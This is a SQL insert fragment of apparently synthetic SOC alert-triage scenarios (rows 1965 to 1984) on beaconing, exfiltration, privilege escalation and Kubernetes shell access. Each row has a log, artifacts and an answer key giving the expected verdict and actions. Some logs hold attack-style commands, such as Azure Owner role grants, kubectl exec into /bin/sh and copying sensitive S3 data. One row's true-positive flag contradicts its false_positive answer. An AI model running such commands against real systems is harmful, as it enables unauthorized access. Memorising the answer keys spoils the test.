(1965, 'Benign System Health Check', 'low', 'Darktrace', 'Detected network traffic resembling beaconing activity. Identified as routine health check by monitoring tool.', 'C2 Beaconing', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.1.10\",\"dst_ip\":\"192.168.1.200\",\"username\":\"monitor_service\",\"hostname\":\"monitoring_tool\",\"command_line\":\"health_check --ping --interval 5\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP for monitoring tool.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"health_check --ping --interval 5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine health check command.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"c2_beaconing\",\"analysis_notes\":\"Traffic resembles beaconing but is an internal system health check.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1966, 'Misconfigured Legacy Application Communication', 'medium', 'Wireshark', 'Detected unusual network traffic patterns from a legacy application server. Confirmed as benign due to misconfiguration.', 'Data Exfiltration', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:20:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.100\",\"username\":\"legacy_app\",\"hostname\":\"legacy_server\",\"command_line\":\"send_data --port 8080 --protocol TCP\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a legacy application server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"send_data --port 8080 --protocol TCP\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command related to misconfigured legacy app communication.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The misconfigured application is causing unusual traffic patterns, not data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1967, 'Suspicious Network Connection from External IP', 'high', 'Suricata', 'A connection attempt was detected from a foreign IP address with a history of malicious activity, targeting an internal server.', 'C2 Beaconing', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.50\",\"username\":\"unknown\",\"hostname\":\"target_server\",\"command_line\":null}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted server.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"c2_beaconing\",\"analysis_notes\":\"The alert is a true positive due to malicious intent from a known bad actor IP.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1968, 'Suspicious Internal Network Traffic Detected', 'medium', 'Zeek', 'Internal network scan detected originating from an authorized vulnerability assessment tool. Traffic resembles lateral movement patterns.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T23:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"audit_user\",\"hostname\":\"vuln-scan01\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal vulnerability scanning tool\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP is an internal asset\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The traffic is consistent with authorized internal network scanning activities.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1969, 'Routine Administrative Backup Process Detected', 'low', 'Corelight', 'Data transfer detected to backup server from internal database server. Activity resembles data exfiltration.', 'Data Exfiltration', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"192.168.2.200\",\"username\":\"backup_admin\",\"hostname\":\"db-server01\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal database server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal backup server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This activity is a normal backup operation scheduled by IT.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1970, 'Legacy Application Misconfiguration Detected', 'medium', 'Suricata', 'Unexpected outbound traffic from a legacy application server to an external IP address. Initially flagged as C2 beaconing.', 'C2 Beaconing', 'T1105', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"203.0.113.200\",\"username\":\"legacy_app\",\"hostname\":\"legacy-app01\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP assigned to legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 5 times for unusual traffic patterns\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"c2_beaconing\",\"analysis_notes\":\"The traffic is due to a misconfigured application attempting to update from a deprecated service.\"}', 'Intermediate', 'NDR', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1971, 'False Positive: Authorized System Health Check', 'low', 'Wireshark', 'Regular system health check traffic detected from a monitoring system. Initially interpreted as potential lateral movement.', 'Lateral Movement', 'T1087', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.25\",\"dst_ip\":\"192.168.4.30\",\"username\":\"monitor\",\"hostname\":\"monitoring01\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP assigned to authorized monitoring system\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.4.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP is a monitored internal system\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This is expected traffic and part of the scheduled system health checks.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1972, 'Unauthorized C2 Beaconing Detected', 'high', 'Darktrace', 'Detected external communication with a known malicious IP. Traffic patterns suggest C2 beaconing from an internal host.', 'C2 Beaconing', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.15\",\"dst_ip\":\"198.51.100.20\",\"username\":\"unknown_user\",\"hostname\":\"workstation-15\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP belongs to an internal workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 120 times for C2 activities\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"c2_beaconing\",\"analysis_notes\":\"The communication with a known malicious IP indicates likely C2 beaconing activity.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1973, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Unauthorized access to an S3 bucket was detected from an external IP. Data exfiltration is suspected.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.10\",\"username\":\"unknown\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /my-sensitive-bucket\",\"command_line\":\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for unauthorized access\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"s3.amazonaws.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Frequent target for unauthorized data access\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /my-sensitive-bucket\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Data exfiltration attempt via S3 API\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The access pattern and external IP indicate a deliberate data exfiltration attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1974, 'Azure IAM Privilege Escalation Alert', 'high', 'Azure Defender', 'Suspicious privilege escalation detected. An internal account was granted admin rights unexpectedly.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"10.0.0.5\",\"username\":\"john.doe@company.com\",\"hostname\":\"azure-portal\",\"request_body\":\"\",\"command_line\":\"az role assignment create --assignee john.doe@company.com --role contributor\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.doe@company.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual role assignment detected\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee john.doe@company.com --role contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Privilege escalation attempt\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The privilege escalation was unauthorized and aligns with known attack patterns.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1975, 'GCP Service Account Hijacking Attempt', 'critical', 'GCP SCC', 'Detected unauthorized token access to a GCP service account. Potential hijacking attempt.', 'Credential Attack', 'T1550', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"token_use\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"10.1.1.2\",\"username\":\"service-account@project-id.iam.gserviceaccount.com\",\"hostname\":\"gcp.googleapis.com\",\"request_body\":\"\",\"command_line\":\"gcloud auth activate-service-account --key-file=key.json\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple hijacking attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account@project-id.iam.gserviceaccount.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Anomalous access pattern detected\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"gcloud auth activate-service-account --key-file=key.json\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Unauthorized use of service account credentials\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of an unauthorized token indicates a hijacking attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1976, 'Prisma Cloud: Kubernetes Privilege Escalation', 'high', 'Prisma Cloud', 'Detected privilege escalation activity within a Kubernetes cluster. Unauthorized admin access detected.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"172.16.0.8\",\"dst_ip\":\"172.16.0.10\",\"username\":\"k8s-admin\",\"hostname\":\"kubernetes-cluster\",\"request_body\":\"\",\"command_line\":\"kubectl exec -it pod -- /bin/sh\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"k8s-admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unexpected admin access detected\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"kubectl exec -it pod -- /bin/sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Potential privilege escalation within Kubernetes\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The escalation of privileges within the Kubernetes cluster suggests lateral movement.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1977, 'Wiz: Unauthorized API Access Detected', 'medium', 'Wiz', 'Suspicious API requests detected from an unrecognized IP address indicating possible unauthorized access.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:25:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.0.2.25\",\"dst_ip\":\"10.2.3.4\",\"username\":\"api-user\",\"hostname\":\"api.example.com\",\"request_body\":\"POST /v1/data HTTP/1.1\",\"command_line\":\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in unauthorized API access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"api-user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual API access pattern detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"api.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Frequent target for unauthorized data access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The unauthorized API requests from a suspicious IP indicate a credential attack.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1978, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'A large amount of data was exfiltrated from an S3 bucket to an unknown IP address. This indicates a potential data leak.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:35:23Z\",\"event_type\":\"s3_data_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.25\",\"username\":\"compromised_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive_data.zip HTTP/1.1\",\"command_line\":\"aws s3 cp s3://mybucket/sensitive_data.zip .\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Database\",\"verdict\":\"internal\",\"details\":\"User account is part of the finance department\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /sensitive_data.zip HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Indicates potential unauthorized data access\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Data was accessed and transferred to an external IP without authorization, indicating a data leak.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1979, 'Azure IAM Privilege Escalation Detected', 'high', 'Azure Defender', 'An unauthorized user gained admin privileges on Azure IAM, which could allow them to execute further attacks.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:45Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"198.51.100.32\",\"dst_ip\":\"10.0.0.5\",\"username\":\"attacker_user\",\"hostname\":\"azure.portal.com\",\"command_line\":\"az role assignment create --assignee attacker_user --role \'Owner\'\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.32\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple privilege escalation incidents\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User exists but should not have admin privileges\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee attacker_user --role \'Owner\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to escalate privileges in Azure\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Unauthorized privilege escalation detected; immediate action required to prevent further malicious activity.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1980, 'GCP Service Account Hijacking', 'critical', 'GCP SCC', 'Anomalous activity detected from a GCP service account indicating potential hijacking.', 'Account Compromise', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:20:30Z\",\"event_type\":\"service_account_usage\",\"src_ip\":\"203.0.113.78\",\"dst_ip\":\"10.2.0.15\",\"username\":\"service-account-123\",\"hostname\":\"cloud.google.com\",\"command_line\":\"gcloud auth activate-service-account --key-file=/tmp/key.json\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with unauthorized service account access\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account-123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal GCP Audit\",\"verdict\":\"internal\",\"details\":\"Service account with unexpected activity\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"gcloud auth activate-service-account --key-file=/tmp/key.json\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used for unauthorized activation of service account\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"account_compromise\",\"analysis_notes\":\"Service account showing signs of compromise; potentially linked to unauthorized access and actions.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1981, 'Prisma Cloud Detects Suspicious Kubernetes Activity', 'high', 'Prisma Cloud', 'Unusual Kubernetes API requests detected suggesting potential compromise of the cluster.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:12Z\",\"event_type\":\"k8s_api_request\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"10.0.0.20\",\"username\":\"k8s-admin\",\"hostname\":\"k8s.cluster.local\",\"command_line\":\"kubectl exec -it pod-name -- /bin/sh\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in Kubernetes API access\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"k8s-admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal LDAP\",\"verdict\":\"internal\",\"details\":\"Admin account with suspicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"kubectl exec -it pod-name -- /bin/sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command indicates potential lateral movement within the cluster\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Suspicious execution in the Kubernetes environment suggests potential for lateral movement.\"}', 'Intermediate', 'CLOUD', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1982, 'Wiz Detects Unusual Serverless Function Execution', 'medium', 'Wiz', 'A serverless function was executed with unexpected parameters, indicating potential misuse.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:50:10Z\",\"event_type\":\"function_execution\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"172.16.0.10\",\"username\":\"lambda_user\",\"hostname\":\"aws.lambda\",\"command_line\":\"node index.js --input=\'malicious_payload\'\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for executing serverless functions with malicious intent\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"node index.js --input=\'malicious_payload\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution with suspicious parameters\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"Unexpected parameters indicate a potential misuse of serverless functions.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1983, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'An unauthorized access to an S3 bucket was detected from an external IP. Sensitive data may have been exfiltrated.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:12Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"username\":\"unauthorized_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data HTTP/1.1\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1247 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"GET /sensitive-data HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected unauthorized data request to S3 bucket\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"S3 bucket internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The unauthorized access and data exfiltration attempt from an external IP confirms this as a true positive attack.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1984, 'Azure IAM Privilege Escalation', 'high', 'Azure Defender', 'An IAM user was granted elevated privileges without proper authorization. Potential for unauthorized access to critical resources.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:27Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"52.174.112.10\",\"username\":\"elevated_user\",\"hostname\":\"azure.microsoft.com\",\"command_line\":\"az role assignment create --assignee elevated_user --role Contributor\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"elevated_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User account within the organization\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the accessing machine\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee elevated_user --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected unauthorized privilege escalation command\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Unauthorized role assignment indicates potential privilege escalation, confirming a true positive.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
